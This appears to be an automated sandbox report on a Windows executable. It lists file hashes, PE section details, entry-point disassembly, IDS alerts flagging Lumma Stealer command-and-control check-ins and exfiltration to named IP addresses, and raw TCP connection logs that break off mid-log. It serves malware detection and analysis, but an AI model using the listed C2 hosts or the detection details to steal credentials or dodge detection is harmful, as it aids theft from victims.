                                                                                                                                                                                                SHA-512:FF87114BC8DAEE6862FEFFBC9BF124C1783C38C4EA1F973A4518FF44BE108355410ABD0D60EC7D904CA4EB9ACC0073BBCE26B1351BABD33DECFAAF8DB5C047E1
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........VMo.6..+.z.,.(.,..f..........Q#..D........J.#..=....y|.8_.k*..6]....Z4.Ay.O.Z..t..r.].Z.B..o:Kk...EV.8s.5....&)..X4...(!.5......._...U'..l.Q.......+x.s.3a...%../....<L.M......u.)W0F..'.z.p~..[..\1Ze..ic.[.......k..@..e.r/[..,../...G..?n.I.e.@.....N....p,}.[.E..C....D#...t.m...q..D....,..;..N....N(i....z.g..n.m......'.%n..d.rt.G..F.2.t..e..;0]S.........(.U.....f%..Q..e.:.1....'....;..:.K..P}..w..p..th.....{.%...N}.h.\%........D....b.".G...F.&.[.#;|..Jp..^SV...x..../w.?.).hq.7.B..x..8..Z...J...A(..m.4.z......?VI.s.c.b.v...W.^.._f)..k..U.!k.....P4.|]1..G`Y..b+"..3..N)..6...Q..y...vN.E....[.oQy.0...............h......^;..+j@.z.]..m.R..kfbuJ.#..l.....d...v..NJ.aD.2.yQ....3r..3U.9Wm.;A.....P.w@,.....N......T.J.wH.K.|..RW:...qo.58m..q..F.0..V......Yh...7..._Fj.v.. ..X....pG..v...SL.....4..x......V5T...*]xz..2.G2..%.~..&.V.....jC..h..A....&ZZ7..lc...z'\t...g)......M....+*uo....V.{..7?h.:...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):464328
                                                                                                                                                                                                Entropy (8bit):5.074669864961383
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:HMB:k
                                                                                                                                                                                                MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):179335
                                                                                                                                                                                                Entropy (8bit):5.435182897681627
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVa:Wof3G0NSkNzMeO7z/l3a
                                                                                                                                                                                                MD5:517954FBCEBC2B0669606202492A4888
                                                                                                                                                                                                SHA1:404819BEF2964D493DF3CB29102719025BEA48AF
                                                                                                                                                                                                SHA-256:211DF9427FF68A7AA97490D30BABCEC089295E6219D461DD2946D24FE919DAEF
                                                                                                                                                                                                SHA-512:21F79D8CB099D874CB2AD32BCE04ADBDE919F3499363E51FE875C0EB409A4EEF555F349351DAB84E39214E26F5320E6E472C0A6A7C06A4CA9EFD1421174CA0C3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from TOPS/20, original size modulo 2^32 25441
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4838
                                                                                                                                                                                                Entropy (8bit):7.9574820676735065
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:T/6L2x+2p9tqVdd66l5UoWws4fB9G4wd88gpNvKrv2gWC:T/Lg2VQdd66nxfB9GvdCM+5C
                                                                                                                                                                                                MD5:DEE0B34CA973D7246A8A07F9EF5C81F0
                                                                                                                                                                                                SHA1:204D6952E0378C110044E799445B9ECD92F54C90
                                                                                                                                                                                                SHA-256:C0E2E812FD38B620A31178230B45FE84F0105131C4F04C65F6EC0614594CA72C
                                                                                                                                                                                                SHA-512:847289B9A3E0FAAC7B8CC75D0DA6632597FE92335E77565CEFC240122F213E93AD60C20BAA42B239269A2634C1977BA7E6785B442840A271A8260E8786BD71EB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........]ks.F..+..~..D.|.jkJ...S.l2........4......$.I........ )D.<SJ%6..........(....._:~.e".:o~.d.....w..5.0.)..../X*....[..8..6.Af+&..>&|)..Q..i|'"...N].kq/.8Yc.&...K.x...X.3..{.6q.V....v...ZK..<..7..*q..c...X..v!.......~.p....iN.\G.8..:.w..Qp....}.q{...u.....'.Jx..]....P....D..uC.....E...dJ?..,.Y.'R..;...OeR.T~I....J.aw.Q0.~..VqT6..m.s..-:CL.....Y...uz..[wXlf@....2@.`K.GFNA..<...j0 ...T,.+"'W].)Zw...K..no4...i7[.G.s.g....(.....j.d...39q..I.3l*.....W)..h..J.e.j..$a7"..._ .0.....T.o..z.O.........f.gq....a.Lap...O..........'v....w.x.[w..O..t]..jh+N7.K...G].9O...Q.................{..{q..,K.n......p.a..L.]..E..]..o...`.....r..d..R7...[..i...,3.1W.......".Re8.(~.P...... .4V."cz@V......@j....e.0u'.P..m.bvV...NzD..-e.C6...o.x..t.z.7.H..$.........|......;....x.....^.0u..z..]@..i..I...7.7.1K..d...G]".#.L'..l..7s..@.....S.`..1......{..!.c...J...^o2.<..........9X..../..b......m..%$.9L..L.I...08.i\...w D........@.`/tC".C..."..,....i.Ep`..24p4.=..
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):7.949290664664254
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                File size:1'836'032 bytes
                                                                                                                                                                                                MD5:88a2e1dc5f57311dc42a7d57dc7d9827
                                                                                                                                                                                                SHA1:a26e33ea17b7d5ca3272e8a7521f141c927d1b75
                                                                                                                                                                                                SHA256:c2c829ba69f689fe392435d8b886c002e050d3bb4cc6ec8f62317ceaa7ba02da
                                                                                                                                                                                                SHA512:b4b2cdc31ced54f377e97f4b548dc128c6c7d1ee9888b6f2a5245b421f9673c9582c9a0a5981e7f70cfa1251e97672a9bec3a71b3d2bf7e7f09438a37ac69ae3
                                                                                                                                                                                                SSDEEP:49152:uPF7j7Uh+8gidJ604qf+/a3Jv9ahTpNYtVYyw:kj7w7605fMa3JQh4Vfw
                                                                                                                                                                                                TLSH:7185331A3A90D94BFF292B34003664A83B3ED7F362C4171B3942DD66CF3696570BA875
                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g............................. I...........@..........................PI...........@.................................\...p..
                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                Entrypoint:0x892000
                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                jmp 00007FA1CCC4AB9Ah
                                                                                                                                                                                                psrad mm3, qword ptr [ebx]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add cl, ch
                                                                                                                                                                                                add byte ptr [eax], ah
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [edi], al
                                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax+0Ah], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                pop es
                                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add cl, byte ptr [edx]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                xor byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                inc eax
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add cl, byte ptr [edx]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                xor byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                sbb al, 00h
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                or byte ptr [eax+00000000h], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add cl, byte ptr [edx]
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add al, 0Ah
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                0x10000x560000x26200172cddc7c2b0ee7cccc20946b5074cafFalse0.9992827868852459data7.981874278944832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x570000x2b00x20018e74e38c0786cc45fafa9f25c228ac2False0.794921875data6.086543254795664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                0x590000x2a10000x2002b10b4ff642328ece1d45ca06d37f4a1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                bfltexda0x2fa0000x1970000x19660029595ad956c30e19fac0dcd1ebc88d89False0.9942121174254076data7.954899185569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                eysgebwh0x4910000x10000x400fa5a7364574ad69116a5f756f8c2abccFalse0.7529296875data6.009808528365732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .taggant0x4920000x30000x22001bc4d532e341386f25f9fbd700f1419dFalse0.060776654411764705DOS executable (COM)0.7271734843937445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                RT_MANIFEST0x4902140x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                kernel32.dlllstrcpy
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-11-24T03:04:08.063341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:08.756732+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:08.756732+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:10.117380+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:10.843734+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:10.843734+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:12.418353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:14.712370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:17.226185+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:19.914033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:20.641197+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:22.887334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:27.849976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:28.607200+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722104.21.33.116443TCP
                                                                                                                                                                                                2024-11-24T03:04:30.108472+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549729185.215.113.1680TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 24, 2024 03:04:00.624396086 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:00.624401093 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:00.733757973 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:06.794289112 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:06.794337988 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:06.794409990 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:06.798994064 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:06.799010992 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.063163996 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.063340902 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.067455053 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.067480087 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.067692995 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.108690977 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.122102022 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.122128963 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.122227907 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.756762028 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.756895065 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.757025957 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.759437084 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.759453058 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.759468079 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.759474993 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.805411100 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.805450916 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:08.805538893 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.805803061 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:08.805825949 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.117186069 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.117379904 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:10.121526003 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:10.121557951 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.121911049 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.123605967 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:10.123647928 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:10.123780012 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.233800888 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:10.233865023 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:10.343115091 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:04:10.843796968 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.843956947 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.844053030 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                                Nov 24, 2024 03:04:10.844055891 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:10.844074011 CET44349705104.21.33.116192.168.2.5
